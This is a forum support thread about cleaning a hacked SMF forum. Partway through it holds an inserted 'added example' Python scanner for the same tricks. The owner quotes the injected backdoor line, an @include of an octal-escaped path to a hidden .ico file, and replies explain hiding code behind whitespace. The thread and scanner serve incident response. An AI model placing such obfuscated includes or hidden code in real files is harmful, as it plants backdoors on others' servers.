hacked help

Started by bynw, April 22, 2020, 10:16:35 PM


bynw

I have a second problem. I have been hacked. I am finding new index.php files with code such as:


<?php
/*bea04*/

@include "\057hom\145/ma\162ikp\156d/r\150emu\164hca\163tle\056com\057sed\151na/\160hot\157gal\154ery\057pho\164o00\060108\0670/.\142fdc\145ecb\056ico";

/*bea04*/


This sometimes is the only code in the index.php file, or the proper index.php file has this code added to the top. I've changed database name/password. I have moved the site to another server. Yet this code keeps showing up. No matter what I do. Is it somewhere in the database then?

How can I get rid of it? Maybe my other issue will go away after that. I haven't tried replacing any files that have been modified, only editing out the extra incorrect code and then deleting any of those extra index.php files from directories.

Also if a directory had an index.htm(l) file it gets renamed to index.htm(l).bak.bak


vbgamer45

Best bet is to copy and back up all your files,

Then do a clean install of SMF.


If you run other scripts such as WordPress, that can also be the source of the infection.
Community Suite for SMF - Grow your forum with SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com - Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

Sir Osis of Liver

Back up your database and files, delete ALL files in the forum directory, upload a clean set of files, upload Settings.php and Settings_bak.php from backup, reinstall mods and themes.  The hack can be in multiple files/directories and reinstalls itself when you clean up index.php.

When in Emor, do as the Snamors.
                              - D. Lister

Looking

Besides the files you need to also make sure:

DB has not been compromised with inserted code that can be brought back up.
Strange accounts on DB that may have unauthorized privileges,
Host security. For instance, versions of software, firewall, shared resources, etc.

Illori

https://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files

Make sure you reset all your passwords associated with your hosting.

Doug Heffernan

What version of SMF do you have? This looks like a case of the server being compromised. Bring your host up to date on this too. Another thing that I would be looking for are backdoors.

bynw

I'm using 2.0.17

I cleaned up the files that were modified. At least that I could tell were modified. And moved it to another host. Fortunately I have more than one available. After moving it that did change the database name/password. FTP information all got changed.

But again I discovered the modified files. So I am really thinking something in the database itself has been compromised, since I transferred that to the new host as well.

I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.

Kindred

If you moved the entire contents and only "cleaned" files which you THOUGHT were compromised, then chances are you actually missed the installed back door.

Usually, once they get in, they will put an actual back door buried 23 directories deep.

That's why you were asked to DELETE EVERYTHING, put back a KNOWN CLEAN copy of SMF and then restore specific files/directories as you confirm that they are not compromised.
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Doug Heffernan

Quote from: bynw on April 23, 2020, 12:11:06 PM
I'm using 2.0.17

I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.

The hidden malicious code, a.k.a. the backdoor, is going to be in the forum folder and not in the database.

Sir Osis of Liver

Cleaned up a couple of hacks where all index.php files in all subdirectories were infected, as were multiple source files.  You're not going to fix this by nitpicking files.  Once the files are clean, then you can worry about the database, but don't think that will be necessary.


Arantor

I would assume every single PHP file is infected, not just index.php ones.

I've seen some sneaky ones over the years, like embedding themselves on the very first line (the <?php line) with a lot of spaces so that in a normal editor you wouldn't see the code because the spaces pushed it to the right.

If you're not going to start with what the industry calls 'nuke and pave', the very first step must be to contain infection by making all files and folders read-only so nothing can be altered without you doing it.
Holder of controversial views, all of which my own.


Bobby

You should:
1. Back up your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!

Kindred

Quote from: Bobby on April 24, 2020, 03:15:10 PM
You should:
1. Back up your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!


no....    this is wrong


first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.


We've told him.

Back up (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch

Bobby

Quote from: Kindred on April 24, 2020, 03:19:31 PM
Quote from: Bobby on April 24, 2020, 03:15:10 PM
You should:
1. Back up your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!


no....    this is wrong


first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.


We've told him.

Back up (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch

Oh yes, I forgot something: you should delete everything in public_html except the attachments and avatars folders and the old Settings.php file, then run upgrade.php! That may be a simple way!

Kindred

no no no no...

there is no need to run upgrade.php.
The OP is not upgrading anything.



See my steps.
follow my steps.


Chen Zhen

The code you posted is actually this (I Xed out the initial path):
@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";

Did you attempt to install some sort of 3rd party photo gallery?

My SMF Mods & Plug-Ins

WebDev

SMF support staff should be shaping a positive community experience & not provoking an argument or emotional reaction.
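The decoding Chen Zhen did by hand above (PHP octal escapes such as \057 and \145 hiding a path to a hidden .ico file), together with Arantor's point about code pushed far right on the &lt;?php line and the index.htm(l).bak.bak renames bynw mentioned, can be turned into a small triage scanner. This is an added example, not code from SMF or from anyone in this thread; the sample strings are constructed with a made-up path, and the 40-blank threshold for the first-line check and the list of "code" extensions are assumptions chosen for this example.

```python
"""Triage helpers for the pattern discussed in this thread.

Added example, not SMF code. It decodes PHP double-quoted string escapes
(the "\\057hom\\145..." form that was decoded by hand above), flags
include/require statements whose target is written with escapes or points
at a non-PHP file such as a hidden .ico, flags a <?php first line where code
is pushed far right with spaces, and lists *.bak.bak renames.
"""
import re
import sys
from pathlib import Path

# PHP double-quoted escapes: \nnn octal (1-3 digits), \xhh hex, and the
# simple ones; anything else is kept literally, which is what PHP does.
_PHP_ESCAPE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(.))', re.S)
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'f': '\f',
           'e': '\x1b', '\\': '\\', '"': '"', '$': '$'}


def decode_php_string(body: str) -> str:
    """Decode the body of a PHP double-quoted string literal."""
    def repl(m):
        octal, hexd, other = m.groups()
        if octal is not None:
            return chr(int(octal, 8) & 0xFF)   # PHP wraps "\400" to "\000"
        if hexd is not None:
            return chr(int(hexd, 16))
        return _SIMPLE.get(other, '\\' + other)
    return _PHP_ESCAPE.sub(repl, body)


# include/require with a double-quoted target, optional @ and parentheses.
# Single-quoted targets cannot carry these escapes, so they are not scanned.
_INCLUDE = re.compile(
    r'@?\s*(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.S)
_CODE_EXT = {'.php', '.inc', '.phtml'}          # assumption: what counts as PHP code
# "<?php" followed by a wall of blanks and then code, so an editor shows nothing.
_FIRST_LINE = re.compile(r'^<\?php[ \t]{40,}\S')  # assumption: 40 blanks is suspicious


def scan_source(src: str) -> list:
    """Return human-readable findings for one PHP source text."""
    findings = []
    if _FIRST_LINE.match(src.split('\n', 1)[0]):
        findings.append('code hidden after a long whitespace run on the <?php line')
    for m in _INCLUDE.finditer(src):
        raw = m.group(1)
        target = decode_php_string(raw)
        reasons = []
        if '\\' in raw:
            reasons.append('target written with string escapes')
        p = Path(target)
        if p.suffix.lower() not in _CODE_EXT:
            reasons.append('non-PHP extension ' + (p.suffix or '(none)'))
        if p.name.startswith('.'):
            reasons.append('hidden dotfile')
        if reasons:
            findings.append(f'include of {target!r}: ' + ', '.join(reasons))
    return findings


def scan_tree(root) -> dict:
    """Walk a forum directory and map relative path -> findings."""
    root = Path(root)
    report = {}
    for path in root.rglob('*'):
        if not path.is_file():
            continue
        rel = str(path.relative_to(root))
        if path.name.endswith('.bak.bak'):
            report[rel] = ['renamed to .bak.bak, as seen in this thread']
        elif path.suffix.lower() in _CODE_EXT:
            hits = scan_source(path.read_text(encoding='utf-8', errors='replace'))
            if hits:
                report[rel] = hits
    return report


# Constructed samples: same shape as the posted snippet, made-up path.
SAMPLE_INFECTED = r'''<?php
/*bea04*/

@include "\057hom\145/sit\145/www\057gal\154ery/.\143afe\056ico";

/*bea04*/
'''
SAMPLE_CLEAN = '<?php\nrequire_once("Sources/Subs.php");\n'
SAMPLE_PADDED = '<?php' + ' ' * 120 + '@include "/srv/.hidden.ico";\n// normal code follows\n'

if __name__ == '__main__':
    if len(sys.argv) > 1:                       # python scan_php.py /path/to/forum
        for rel, hits in sorted(scan_tree(sys.argv[1]).items()):
            print(rel, *hits, sep='\n    ')
    else:
        for name, src in (('infected', SAMPLE_INFECTED), ('clean', SAMPLE_CLEAN),
                          ('padded', SAMPLE_PADDED)):
            print(name, scan_source(src))
```

Run it against the backup copy of the forum tree (not the live one) to get a list of files worth looking at; it is a triage aid for deciding what to restore, not a replacement for the delete-everything-and-reload-clean-files advice given above, because it only recognises the specific tricks described in this thread.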

Arantor

That looks to me like something masquerading as a legitimate URL to smuggle in something not legitimate. Common tactic.


bynw

Quote from: Chen Zhen on April 24, 2020, 06:48:30 PM
The code you posted is actually this (I Xed out the initial path):
@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";

Did you attempt to install some sort of 3rd party photo gallery?


No, that was just a folder that was linked to off the forum. Not integrated into it. No PHP files at all. I don't see that .ico file in the backup though.

Chen Zhen

You seem to be at the point of a fresh SMF upgrade for the moment.

When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.

Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?




bynw

Quote from: Chen Zhen on April 24, 2020, 08:49:00 PM
You seem to be at the point of a fresh SMF upgrade for the moment.

When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.

Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?





I don't think I had PHP blocks on the portal. And didn't see anything when I just now reinstalled it. I'm not using any of the articles features on the portal. Just some side blocks.

The only mods came from SMF
